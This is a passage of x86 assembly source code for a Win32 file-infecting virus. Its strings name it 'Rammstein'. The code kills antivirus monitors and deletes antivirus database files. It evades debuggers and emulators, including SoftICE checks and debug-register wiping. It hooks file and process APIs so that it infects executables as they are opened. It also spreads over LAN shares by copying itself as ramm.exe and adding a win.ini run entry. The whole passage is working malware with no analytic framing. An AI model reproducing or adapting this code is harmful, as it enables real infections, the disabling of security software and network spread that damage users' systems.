lea eax, [ebp+Thread3Exception] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
ENDIF ;
;
IF ANTIAV ;
lea esi, [ebp+av_monitors] ;First kill some monitors
mov ecx, monitors_nr ;
;
LocateMonitors: ;
push ecx ;
call [ebp+_FindWindowA], 0, esi ;
xchg eax, ecx ;
jecxz get_next_monitor ;
call [ebp+_PostMessageA], ecx, WM_ENDSESSION, 0, 0
;
get_next_monitor: ;
@endsz ;
pop ecx ;
loop LocateMonitors ;
;
lea esi, [ebp+offset av_list] ;point av files list
mov ecx, av_list_len ;and
call not_list ;restore names...
inc esi ;
inc esi ;
lea edi, [ebp+offset searchfiles] ;point to Search Record
;
locate_next_av: ;
mov eax, esi ;
cmp byte ptr [eax], 0FFh ;is this the end?
je av_kill_done ;
push edi ;push search rec. address
push eax ;push filename address
call [ebp+_FindFirstFileA] ;find first match
inc eax ;
jz next_av_file ;
dec eax ;
push eax ;
lea ebx, [edi.WFD_cFileName] ;EBX = ptr to filename
push 80h ;
push ebx ;
call [ebp+_SetFileAttributesA] ;
push ebx ;push filename address
call [ebp+_DeleteFileA] ;delete file!
;
call [ebp+_FindClose] ;close the find handle
;
next_av_file: ;
@endsz ;
jmp locate_next_av ;
;
av_kill_done: ;
lea esi, [ebp+offset av_list] ;point av files list
mov ecx, av_list_len ;
call not_list ;hide names...
ENDIF ;
;
IF THREAD3SEH ;
jmp restore_thread3_seh ;host
;
Thread3Exception: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
call DeltaRecover3 ;
DeltaRecover3: ;
pop ebp ;
sub ebp, offset DeltaRecover3 ;
;
restore_thread3_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
ENDIF ;
;
push 0 ;
push 5 ;
push [ebp+hsemaphore] ;
call [ebp+_ReleaseSemaphore] ;
call [ebp+_ExitThread], 0 ;
Thread_3_StartAddress endp ;
av_monitors label ;
db 'AVP Monitor', 0 ;
db 'Amon Antivirus Monitor', 0 ;
monitors_nr = 2 ;
;
searchfiles WIN32_FIND_DATA <?> ;
;
av_list label ;
noter <L> ;
noter <AVP.CRC> ;the av files to kill
noter <IVP.NTZ> ;
noter <Anti-Vir.DAT> ;
noter <CHKList.MS> ;
noter <CHKList.CPS> ;
noter <SmartCHK.MS> ;
noter <SmartCHK.CPS> ;
noter <AVG.AVI> ;
noter <NOD32.000> ;
noter <DRWEBASE.VDB> ;
noter <AGUARD.DAT> ;
noter <AVGQT.DAT> ;
noter <LGUARD.VPS> ;
av_list_len = $ - offset av_list ;
db 0FFh ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Û This Thread is the anti-debugging and anti-emulation thread
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Thread_4_StartAddress proc PASCAL tdelta: dword ;
call @Thread4Delta ;
@Thread4Delta: ;
pop ebp ;
sub ebp, offset @Thread4Delta ;
;
IF THREAD4SEH ;
lea eax, [ebp+Thread4Exception] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
ENDIF ;
;
IF ANTIEMU ;
lea eax, [ebp+DebuggerKill] ;antidebugging stuffs.
push eax ;Here we set up a new
xor ebx, ebx ;seh frame and then we
push dword ptr fs:[ebx] ;make an exception error
mov fs:[ebx], esp ;occur.
dec dword ptr [ebx] ;TD stops here if in
;default mode.
jmp shut_down ;
;
DebuggerKill: ;
mov esp, [esp+8] ;the execution goes here
pop dword ptr fs:[0] ;
add esp, 4 ;
;
db 0BDh ;delta gets lost so we
delta2 dd 0 ;must restore it...
;
call @7 ;here we try to retrieve
db 'IsDebuggerPresent', 0 ;IsDebuggerPresent API
@7: push [ebp+k32] ;if we fail it means we
call [ebp+_GetProcAddress] ;don't have this api
or eax, eax ;(Windows95)
jz continue_antiemu ;
;
call eax ;Let's check if our
or eax, eax ;process is being
jne shut_down ;debugged.
;
mov ecx, fs:[20h] ; ECX = Context of debugger
jecxz softice ; If ECX<>0, we're debugged
jmp shut_down ;
;
softice: ;
lea edi, [ebp+SoftIce1] ;try to see if we are
call detect_softice ;being debugged by
jc shut_down ;softice
lea edi, [ebp+SoftIce1] ;
call detect_softice ;
jc shut_down ;
jmp nod_ice ;
;
detect_softice: ;
xor eax, eax ;
push eax ;
push 00000080h ;
push 00000003h ;
push eax ;
inc eax ;
push eax ;
push 80000000h or 40000000h ;
push edi ;
call [ebp+_CreateFileA] ;
;
inc eax ;
jz cantcreate ;
dec eax ;
;
push eax ;
call [ebp+_CloseHandle] ;
stc ;
db 0c3h ;
;
cantcreate: ;
clc ;
db 0c3h ;
;
nod_ice: ;
cmp byte ptr [ebp+version], 4 ;can we use debug regs?
jae cannot_kill_debug ;
;
lea esi, [ebp+drs] ;Debug Registers opcodes
mov ecx, 7 ;7 registers
lea edi, [ebp+bait] ;point the opcode place
;
repp: ;
lodsb ;take the opcode
mov byte ptr [edi], al ;generate instruction
call zapp ;call it!
loop repp ;do it again
jmp compute_now ;
;
zapp: ;
xor eax, eax ;eax = 0
dw 230fh ;to mov DRx, eax
bait label ;
db 0 ;
db 0C3h ;
;
drs db 0c0h, 0c8h, 0d0h, 0d8h, 0e8h, 0f0h, 0f8h ;debug registers opcodes
;
compute_now: ;
mov eax, dr0 ;
cmp eax, 0 ;
jne shut_down ;
;
cannot_kill_debug: ;
IF MMX ;
cmp [ebp+mmx], TRUE ;
jne no_mmx_here ;
mov ecx, 6666h ;do some loops
mov eax, 1111h ;very lite mmx_usage
; movd1 mm1, esi ;
; movd1 eax, mm1 ;
; cmp eax, esi ;
; jne shut_down ;
ENDIF ;
;
no_mmx_here: ;
mov ebx, esp ;or by nod ice and
push cs ;others...
pop eax ;
cmp esp, ebx ;
jne shut_down ;
jmp continue_antiemu ;
;
shut_down: ;
IF DEBUG ;
call [ebp+_MessageBoxA], 0, offset debug, offset debug, 0
ENDIF ;
push 0 ;If so, close down!!
call [ebp+_ExitProcess] ;close
IF DEBUG ;
debug db 'Shut down by anti-emulator', 0 ;
ENDIF ;
continue_antiemu: ;
ELSE ;
ENDIF ;
;
IF THREAD4SEH ;
jmp restore_thread4_seh ;host
;
Thread4Exception: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
call DeltaRecover4 ;
DeltaRecover4: ;
pop ebp ;
sub ebp, offset DeltaRecover4 ;
;
restore_thread4_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
ENDIF ;
;
push 0 ;
push 5 ;
push [ebp+hsemaphore] ;
call [ebp+_ReleaseSemaphore] ;
call [ebp+_ExitThread], 0 ;
;
SoftIce1 db "\\.\SICE",0 ;
SoftIce2 db "\\.\NTICE",0 ;
Thread_4_StartAddress endp ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Û This Thread is the API hooker thread
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Thread_5_StartAddress proc PASCAL tdelta: dword ;
call @Thread5Delta ;
@Thread5Delta: ;
pop ebp ;
sub ebp, offset @Thread5Delta ;
;
IF THREAD5SEH ;
lea eax, [ebp+Thread5Exception] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
ENDIF ;
;
cmp [ebp+skipper], 1 ;
je error ;
;
IF APIHOOK ;
cmp [ebp+firstgen], 1 ;don't hook gen0
je error ;
mov ebx, dword ptr [ebp+ourimagebase] ; now put imagebase in ebx
mov esi, ebx ;
mov ax, word ptr [esi] ;
xor ax, 'GSRS' ;
cmp ax, 'ZM' xor 'GSRS' ; check if it is an EXE
jne error ;
mov esi, dword ptr [esi.MZ_lfanew] ; get pointer to PE
cmp esi, 1000h ; too far away?
jae error ;
add esi, ebx ;
mov ax, word ptr [esi] ;
xor ax, 'DC4û' ;
cmp ax, 'EP' xor 'DC4û' ; is it a PE?
jne error ;
add esi, IMAGE_FILE_HEADER_SIZE ; skip header
mov edi, dword ptr [esi.OH_DataDirectory.DE_Import.DD_VirtualAddress]
add edi, ebx ; and get import RVA
mov ecx, dword ptr [esi.OH_DataDirectory.DE_Import.DD_Size]
add ecx, edi ; and import size
mov eax, edi ; save RVA
;
locate_module: ;
mov edi, dword ptr [edi.ID_Name] ; get the name
add edi, ebx ;
push eax ;
mov eax, [edi] ;
xor eax, 'øSOHáý' ;
cmp eax, 'NREK' xor 'øSOHáý' ; and compare to KERN
pop eax ;
je found_the_import_module ; if it is not that one
add eax, IMAGE_IMPORT_DESCRIPTOR_SIZE ; skip to the next desc.
mov edi, eax ;
cmp edi, ecx ; but not beyond the size
jae error ; of the descriptor
jmp locate_module ;
;
found_the_import_module: ; if we found the kernel
mov edi, eax ; import descriptor
mov esi, dword ptr [edi.ID_FirstThunk] ; take the pointer to
add esi, ebx ; addresses
mov edi, dword ptr [edi.ID_Characteristics] ; and the pointer to
or edi, edi ; no names? ;-(
jz error ;
add edi, ebx ; names
mov edx, functions_nr ;
;
hooked_api_locate_loop: ;
push edi ; save pointer to names
mov edi, dword ptr [edi.TD_AddressOfData] ; go to the actual thunk
add edi, ebx ;
add edi, 2 ; and skip the hint
;
push edi esi ; save these
xchg edi, esi ;
call StringCRC32 ; eax = crc32
;
push edi ecx ;search them...
lea edi, [ebp+HookedFunctions] ;
mov ecx, functions_nr ;
;
check: ;
cmp [edi], eax ;does it match?
je found_it ;
add edi, 8 ;get next...
loop check ;
jmp not_found ;
;
found_it: ;
mov eax, [edi+4] ;get the new address
mov [ebp+tempcounter], edi ;
add eax, ebp ;and align to imagebase
pop ecx edi ;
jmp found_one_api ;
;
not_found: ;
pop ecx edi ;
;
pop esi edi ; otherwise restore
;
pop edi ; restore arrays indexes
;
api_next: ;
add edi, 4 ; and skip to next
add esi, 4 ;
cmp dword ptr [esi], 0 ; 0? -> end of import
je error ;
jmp hooked_api_locate_loop ;
;
found_one_api: ;
pop esi ; restore stack
pop edi ;
pop edi ;
;
pusha ;
mov edi, [ebp+tempcounter] ;
mov ebx, [esi] ;
lea eax, [ebp+offset HookedFunctions] ;
sub edi, eax ;
mov ecx, 8 ;
xchg eax, edi ;
xor edx, edx ;
div ecx ;
imul eax, eax, proc_len ;
lea edi, [ebp+StartOfHooks] ;
add edi, eax ;
mov byte ptr [edi+5], 0E9h ;
sub ebx, edi ;
add ebx, 05h-0fh ;
mov [edi+6], ebx ;
popa ;
;
mov [esi], eax ;save new api address!!!
dec edx ;did we find all?
jz error ;
jmp api_next ;
ENDIF ;
;
error: ;
mov [ebp+apihookfinish], 1 ;
IF THREAD5SEH ;
jmp restore_thread5_seh ;host
;
Thread5Exception: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
call DeltaRecover5 ;
DeltaRecover5: ;
pop ebp ;
sub ebp, offset DeltaRecover5 ;
;
restore_thread5_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
ENDIF ;
;
push 0 ;
push 5 ;
push [ebp+hsemaphore] ;
call [ebp+_ReleaseSemaphore] ;
call [ebp+_ExitThread], 0 ;
Thread_5_StartAddress endp ;
;
StartOfHooks label ;
Hook_CopyFileA: ;Here come the hook
call Hooker ;redirectors...
jmp [ebp+_CopyFileA] ;
Hook_CopyFileExA: ;
call Hooker ;
jmp [ebp+_CopyFileExA] ;
Hook_CreateFileA: ;
call CreateFileHooker ;
jmp [ebp+_CreateFileA] ;
Hook_GetCompressedFileSizeA: ;
call Hooker ;
jmp [ebp+_GetCompressedFileSizeA] ;
Hook_GetFileAttributesA: ;
call Hooker ;
jmp [ebp+_GetFileAttributesA] ;
Hook_GetFileAttributesExA: ;
call Hooker ;
jmp [ebp+_GetFileAttributesExA] ;
Hook_SetFileAttributesA: ;
call Hooker ;
jmp [ebp+_SetFileAttributesA] ;
Hook_GetFullPathNameA: ;
call Hooker ;
jmp [ebp+_GetFullPathNameA] ;
Hook_MoveFileA: ;
call Hooker ;
jmp [ebp+_MoveFileA] ;
Hook_MoveFileExA: ;
call Hooker ;
jmp [ebp+_MoveFileExA] ;
Hook_OpenFile: ;
call Hooker ;
jmp [ebp+_OpenFile] ;
Hook_CreateProcessA: ;
call Hooker ;
jmp [ebp+_CreateProcessA] ;
Hook_WinExec: ;
call Hooker ;
jmp [ebp+_WinExec] ;
Hook_DestroyWindow: ;
call ExitProcessHooker ;
jmp [ebp+_DestroyWindow] ;
Hook_ExitProcess: ;
call ExitProcessHooker ;
jmp [ebp+_ExitProcess] ;
proc_len = $-Hook_ExitProcess ;
;
Hooker proc ;And this is our hook...
pushad ;
pushfd ;
;
call @HookerDelta ;
@HookerDelta: ;
pop ebp ;
sub ebp, offset @HookerDelta ;
;
IF VIRUSNOTIFYHOOK ;
pusha ;
push 0 ;
call hooktext1 ;
db 'Rammstein viral hook code!', 0 ;
hooktext1: ;
call hooktext2 ;
db 'Rammstein viral hook code!', 0 ;
hooktext2: ;
push 0 ;
call [ebp+_MessageBoxA] ;
popa ;
ENDIF ;
;
good_to_infect: ;
mov esi, [esp+2ch] ;
push esi ;
call ValidateFile ;first validate the file
pop edi ;
jc no_good_file ;
;
@003: cmp [ebp+free_routine], NOT_AVAILABLE ;
je @003 ;
mov [ebp+free_routine], NOT_AVAILABLE ;
call InfectFile ;
mov [ebp+free_routine], AVAILABLE ;
;
no_good_file: ;
popfd ;
popa ;
ret ;
Hooker endp ;
;
ExitProcessHooker proc ;
pusha ;
call ExitHookerEbp ;
ExitHookerEbp: ;
pop ebp ;
sub ebp, offset ExitHookerEbp ;
;
mov [ebp+process_end], 1 ;
@fo: cmp [ebp+fileopen], TRUE ;we cannot allow shutdown
je @fo ;while our thread has a
popa ;file opened...
ret ;
ExitProcessHooker endp ;
;
CreateFileHooker proc ;
pusha ;
pushfd ;
call CreateFileEbp ;
CreateFileEbp: ;
pop ebp ;
sub ebp, offset CreateFileEbp ;
mov eax, [esp+2ch+4+4+4+4] ;
cmp eax, OPEN_EXISTING ;
je good_to_infect ;
;
popfd ;
popa ;
ret ;
CreateFileHooker endp ;
;
HookedFunctions: ;
crc32 <CopyFileA> ;
dd offset Hook_CopyFileA ;
crc32 <CopyFileExA> ;
dd offset Hook_CopyFileExA ;
crc32 <CreateFileA> ;
dd offset Hook_CreateFileA ;
crc32 <GetCompressedFileSizeA> ;
dd offset Hook_GetCompressedFileSizeA ;
crc32 <GetFileAttributesA> ;
dd offset Hook_GetFileAttributesA ;
crc32 <GetFileAttributesExA> ;
dd offset Hook_GetFileAttributesExA ;
crc32 <SetFileAttributesA> ;
dd offset Hook_SetFileAttributesA ;
crc32 <GetFullPathNameA> ;
dd offset Hook_GetFullPathNameA ;
crc32 <MoveFileA> ;
dd offset Hook_MoveFileA ;
crc32 <MoveFileExA> ;
dd offset Hook_MoveFileExA ;
crc32 <OpenFile> ;
dd offset Hook_OpenFile ;
crc32 <CreateProcessA> ;
dd offset Hook_CreateProcessA ;
crc32 <WinExec> ;
dd offset Hook_WinExec ;
crc32 <XDestroyWindow> ;
dd offset Hook_DestroyWindow ;
crc32 <ExitProcess> ;
dd offset Hook_ExitProcess ;
functions_nr = ($-offset HookedFunctions)/8 ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Û This Thread is the Network Infector
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Thread_6_StartAddress proc PASCAL tdelta: dword ;
call @Thread6Delta ;
@Thread6Delta: ;
pop ebp ;
sub ebp, offset @Thread6Delta ;
;
IF NETWORKINFECTION ;
cmp [ebp+netapis], FALSE ;
je exit_netcrawl ;
;
IF THREAD6SEH ;
lea eax, [ebp+Thread6Exception] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
ENDIF ;
;
call NetInfection C, 0 ;
jmp done_net ;
;
NetInfection proc C lpnr:DWORD ;
;
local lpnrLocal :DWORD ;
local hEnum :DWORD ;
local ceEntries :DWORD ;
local cbBuffer :DWORD ;
;
pusha ;
call get_new_delta ;
get_new_delta: ;
pop edx ;
sub edx, offset get_new_delta ;
;
mov [ceEntries], 0FFFFFFFFh ;as many entries as poss.
mov [cbBuffer], 4000 ;memory buffer size
lea eax, [hEnum] ;handle to enumeration
mov esi, [lpnr] ;parameter
call [edx+_WNetOpenEnumA], RESOURCE_CONNECTED,\ ;open the enumeration
RESOURCETYPE_ANY, 0,\ ;
esi, eax ;
;
or eax, eax ;failed?
jnz exit_net ;
;
call [edx+_GlobalAlloc], GPTR, cbBuffer ;allocate memory
or eax, eax ;
jz exit_net ;
mov [lpnrLocal], eax ;save memory handle
;
enumerate: ;
lea eax, cbBuffer ;enumerate all the
push eax ;resources
mov esi, [lpnrLocal] ;
push esi ;
lea eax, ceEntries ;
push eax ;
push hEnum ;
call [edx+_WNetEnumResourceA] ;
;
or eax, eax ;failed?
jnz free_mem ;
;
mov ecx, [ceEntries] ;how many entries?
or ecx, ecx ;
jz enumerate ;
;
roam_net: ;
push ecx esi ;
;
mov eax, [esi.dwType] ;is it a disk resource?
test eax, RESOURCETYPE_DISK ;
jz get_next_entry ;
;
mov edi, [esi.lpRemoteName] ;get remote name
mov esi, [esi.lpLocalName] ;get local name
or esi, esi ;empty?
jz no_good_name ;
;
cmp word ptr [esi],0041 ;is it a floppy disk?
jz no_good_name ;
;
call RemoteInfection ;try to infect it!
;
no_good_name: ;
pop esi ;
;
mov eax, [esi.dwUsage] ;do we have a container?
test eax, RESOURCEUSAGE_CONTAINER ;
jz get_next_entry ;
;
push esi ;
call NetInfection ;recurse!!
;
get_next_entry: ;
add esi, 20h ;next resource!
pop ecx ;
loop roam_net ;
;
jmp enumerate ;and next enumeration...
;
free_mem: ;
call [edx+_GlobalFree], [lpnrLocal] ;free the memory
;
call [edx+_WNetCloseEnum], [hEnum] ;and close enumeration.
;
exit_net: ;
popa ;
ret ;
NetInfection endp ;
;
RemoteInfection proc ;
pusha ;
call @___1 ;restore the delta handle
@___1: ;
pop ebp ;
sub ebp, offset @___1 ;
;
push 260 ;get the current file
lea eax, [ebp+myname] ;name
push eax ;
push 0 ;
call [ebp+_GetModuleFileNameA] ;
or eax, eax ;
jz cannot_roam ;
;
lea esi, [ebp+windirs] ;point windows dir names
;
test_paths: ;
lea ebx, [ebp+droppername] ;copy path for dropper
call [ebp+_lstrcpy], ebx, edi ;
lea ebx, [ebp+winininame] ;copy path for win.ini
call [ebp+_lstrcpy], ebx, edi ;
;
lea ebx, [ebp+droppername] ;copy windows dir
call [ebp+_lstrcat], ebx, esi ;
lea eax, [ebp+drop] ;and dropper name
call [ebp+_lstrcat], ebx, eax ;
;
push TRUE ;now copy ourself over
push ebx ;the LAN under the new
lea eax, [ebp+myname] ;name into the remote
push eax ;windows directory
call [ebp+_CopyFileA] ;
or eax, eax ;
jz test_next ;
;
lea ebx, [ebp+winininame] ;copy the windows dir name
call [ebp+_lstrcat], ebx, esi ;to the win.ini path
lea eax, [ebp+winini] ;
call [ebp+_lstrcat], ebx, eax ;and it's name
;
lea eax, [ebp+winininame] ;Now create this entry
push eax ;into the win.ini file:
lea eax, [ebp+droppername] ;
push eax ;[Windows]
lea eax, [ebp+cmd] ;run=c:\windows\ramm.exe
push eax ;
inc esi ;
push esi ;
call [ebp+_WritePrivateProfileStringA] ;
jmp cannot_roam ;
;
test_next: ;
@endsz ;go and try the next
cmp byte ptr [esi], 0fh ;windows path!
jne test_paths ;
;
cannot_roam: ;
popa ;
ret ;
;
smash_dropper proc ;this procedure acts like
pusha ;this:
push 260 ;if the file ramm.exe
call ramm_name ;exists in the windows dir
r_n: db 260 dup(0) ;and there is no entry
ramm_name: ;to run it at next boot
call [ebp+_GetWindowsDirectoryA] ;in the win.ini file, then
;it will erase the file.
lea edx, [ebp+r_n] ;if the file ramm.exe
push edx ;does not exist, but there
call [ebp+_lstrlen] ;is an entry in the win
mov edi, eax ;ini file, then it will
;remove the entry.
lea eax, [ebp+drop] ;If both are present
push eax ;they are left alone.
lea edx, [ebp+r_n] ;
push edx ;
call [ebp+_lstrcat] ;
;
lea eax, [ebp+W32FD] ;locate ramm.exe
push eax ;
push edx ;
call [ebp+_FindFirstFileA] ;
mov [ebp+ok], 0 ;
cmp eax, INVALID_HANDLE_VALUE ;
je no_file ;
mov [ebp+ok], 1 ;
;
no_file: ;
lea edx, [ebp+r_n] ;save name
lea eax, [ebp+droppername] ;
push edx ;
push eax ;
call [ebp+_lstrcpy] ;
;
mov byte ptr [edx+edi], 0 ;
lea eax, [ebp+winini] ;
push eax ;
push edx ;
call [ebp+_lstrcat] ;
;open win.ini
push 0 ;
push 0 ;
push OPEN_EXISTING ;
push 0 ;
push 0 ;
push GENERIC_READ + GENERIC_WRITE ;
push edx ;
call [ebp+_CreateFileA] ;
inc eax ;
jz no_need ;
dec eax ;
mov [ebp+hfile], eax ;
;
push 0 ;
push eax ;
call [ebp+_GetFileSize] ;
mov [ebp+filesize], eax ;
;
push 0 ;
push [ebp+filesize] ;
push 0 ;
push PAGE_READWRITE ;
push 0 ;
push [ebp+hfile] ;
call [ebp+_CreateFileMappingA] ;
;
or eax, eax ;
jz no_need_1 ;
mov [ebp+hmap], eax ;
;
push [ebp+filesize] ;
push 0 ;
push 0 ;
push FILE_MAP_ALL_ACCESS ;
push [ebp+hmap] ;
call [ebp+_MapViewOfFile] ;
;
or eax, eax ;
jz no_need_2 ;
mov [ebp+haddress], eax ;
;
mov ecx, [ebp+filesize] ;
sub ecx, 8 ;
;
src_loop: ;
cmp dword ptr [eax] , 'mmar' ;search "ramm.exe"
jne no_ramm ;
cmp dword ptr [eax+4], 'exe.' ;
je found_ramm ;
;
no_ramm: ;
inc eax ;
loop src_loop ;
;
lea eax, [ebp+droppername] ;
push eax ;
call [ebp+_DeleteFileA] ;
jmp kill_memo ;
;
found_ramm: ;
cmp [ebp+ok], 0 ;
jne kill_memo ;
;
mov edx, eax ;
add edx, 8 ;
;
rep_for_run: ;
cmp [eax], "=nur" ;search backwards for
je finished_searching ;"run="
dec eax ;
cmp eax, [ebp+haddress] ;
je kill_memo ;
jmp rep_for_run ;
;
finished_searching: ;
mov edi, eax ;put blanks over it!
mov al, " " ;
mov ecx, edx ;
sub ecx, edi ;
rep stosb ;
;
kill_memo: ;
push [ebp+haddress] ;close win.ini!
call [ebp+_UnmapViewOfFile] ;
;
no_need_2: ;
push [ebp+hmap] ;
call [ebp+_CloseHandle] ;
;
no_need_1: ;
push [ebp+hfile] ;
call [ebp+_CloseHandle] ;
;
no_need: ;
popa ;
ret ;
smash_dropper endp ;
;
windirs db "\Windows", 0 ;
db "\WinNT" , 0 ;
db "\Win" , 0 ;
db "\Win95" , 0 ;
db "\Win98" , 0 ;
db 0fh ;
;
winini db "\Win.ini" , 0 ;
drop db "\ramm.exe", 0 ;
cmd db "run" , 0 ;
;
myname db 260 dup(0) ;
droppername db 260 dup(0) ;
winininame db 260 dup(0) ;
RemoteInfection endp ;
;
done_net: ;
IF THREAD6SEH ;
jmp restore_thread6_seh ;host
;
Thread6Exception: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
call DeltaRecover6 ;
DeltaRecover6: ;
pop ebp ;
sub ebp, offset DeltaRecover6 ;
;
restore_thread6_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
ENDIF ;
;
ENDIF ;
;
exit_netcrawl: ;
push 0 ;
push 5 ;
push [ebp+hsemaphore] ;
call [ebp+_ReleaseSemaphore] ;
call [ebp+_ExitThread], 0 ;
Thread_6_StartAddress endp ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
OurThreads dd offset Thread_1_StartAddress ;
dd offset Thread_2_StartAddress ;
dd offset Thread_3_StartAddress ;
dd offset Thread_4_StartAddress ;
dd offset Thread_5_StartAddress ;
dd offset Thread_6_StartAddress ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ReturnToHost: ;
jmp restore_seh ;host
;
ExceptionExit: ;if we had an error we
IF DEBUG ;
call MessageBoxA, 0, offset err, offset err, 0
jmp go_over ;
err db 'SEH Error!', 0 ;
go_over: ;
ELSE ;
ENDIF ;
mov esp, [esp+8] ;must restore the ESP
;
restore_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;returning to the host...
;
db 0BDh ;restore delta handle
delta dd 0 ;
;
cmp [ebp+firstgen], 1 ;
je generation0_exit ;
;
IF APIHOOK ;if api hook is on we
apicheck: ;cannot return to host
cmp [ebp+apihookfinish], 1 ;until the hooking is
jne apicheck ;done...
ENDIF ;
;
mov eax, 12345678h ;mov eax, oledip
oldeip equ $-4 ;
add eax, 12345678h ;add eax, imagebase
adjust equ $-4 ;
mov dword ptr [ebp+savedeax], eax ;
popa ;
;
push 12345678h ;
savedeax equ $-4 ;
ret ;
;
generation0_exit: ;
push 0 ;
call [ebp+_ExitProcess] ;
;
InfectFile proc ;
pusha ;save regs
mov [ebp+flag], 1 ;mark success flag
mov [ebp+filename], edi ;save filename
mov esi, edi ;
call ValidateFile ;
jc failed_infection ;
;
call [ebp+_GetFileAttributesA], edi ;get attributes
mov [ebp+fileattributes], eax ;and save them
call [ebp+_SetFileAttributesA], edi, FILE_ATTRIBUTE_NORMAL; and set
;them normal
call [ebp+_CreateFileA], edi, GENERIC_READ+GENERIC_WRITE, 0, 0,\
OPEN_EXISTING, 0, 0 ;open file
cmp eax, INVALID_HANDLE_VALUE ;
je finished ;
mov [ebp+hfile], eax ;
;
mov [ebp+fileopen], TRUE ;
;
lea ebx, [ebp+filetime1] ;save file time
push ebx ;
add ebx, 8 ;
push ebx ;
add ebx, 8 ;
push ebx ;
call [ebp+_GetFileTime], eax ;
;
call [ebp+_GetFileSize], [ebp+hfile], 0 ;get file size
mov [ebp+filesize], eax ;
add eax, virussize + 1000h ;
mov [ebp+additional], eax ;save additional length
;
call [ebp+_CreateFileMappingA], [ebp+hfile], 0, PAGE_READWRITE,\
0, [ebp+additional], 0
or eax, eax ;create mapping object
je close_file ;
;
mov [ebp+hmap], eax ;
;
call [ebp+_MapViewOfFile], [ebp+hmap], FILE_MAP_ALL_ACCESS, 0, 0,\
[ebp+additional] ;map file!
or eax, eax ;
je close_map ;
;
mov [ebp+haddress], eax ;save address of mapping
mov esi, eax ;
;
mov ax, word ptr [esi] ;check exe sign
xor ax, 'Úß' ;
cmp ax, 'ZM' xor 'Úß' ;
jne close_address ;
;
call InitCopro ;check infection mark
fild word ptr [esi.MZ_oeminfo] ;this is number a
fild word ptr [esi.MZ_oeminfo] ;
fmul ;
call RestoreCopro ;
add esp, 4 ;
;
mov esi, [esi.MZ_lfanew] ;get pointer to pe header
cmp esi, 1000h ;
ja close_address ;
add esi, [ebp+haddress] ;
;
call [ebp+_IsBadReadPtr], esi, 1000h ;check readability
or eax, eax ;
jnz close_address ;
;
mov [ebp+peheader], esi ;save pe header
;
mov ax, word ptr [esi] ;check if pe file
xor ax, 'õð' ;
cmp ax, 'EP' xor 'õð' ;
jne close_address ;
;
test word ptr [esi.Characteristics], IMAGE_FILE_DLL; be sure it's not
jnz close_address ;a library
;
lea edi, [ebp+pedata] ;
xor eax, eax ;
mov ax, [esi.NumberOfSections] ;save number of sections
stosd ;
mov ax, [esi.SizeOfOptionalHeader] ;save optional header
stosd ;
add esi, IMAGE_FILE_HEADER_SIZE ;get to the optional head.
mov [ebp+optionalheader], esi ;
;
cmp word ptr [esi.OH_MajorImageVersion], 0 ;
je skip_check ;
cmp word ptr [esi.OH_MinorImageVersion], 0 ;
je skip_check ;
call InitCopro ;
fild word ptr [esi.OH_MajorImageVersion] ;this is number b
fild word ptr [esi.OH_MajorImageVersion] ;
fmul ;
fild word ptr [esi.OH_MinorImageVersion] ;this is number c
fild word ptr [esi.OH_MinorImageVersion] ;
fmul ;
fadd ;
fsub ;here is b^2+c^2-a^2
fldz ;is it 0?
fcompp ;compare them
fstsw ax ;get status word
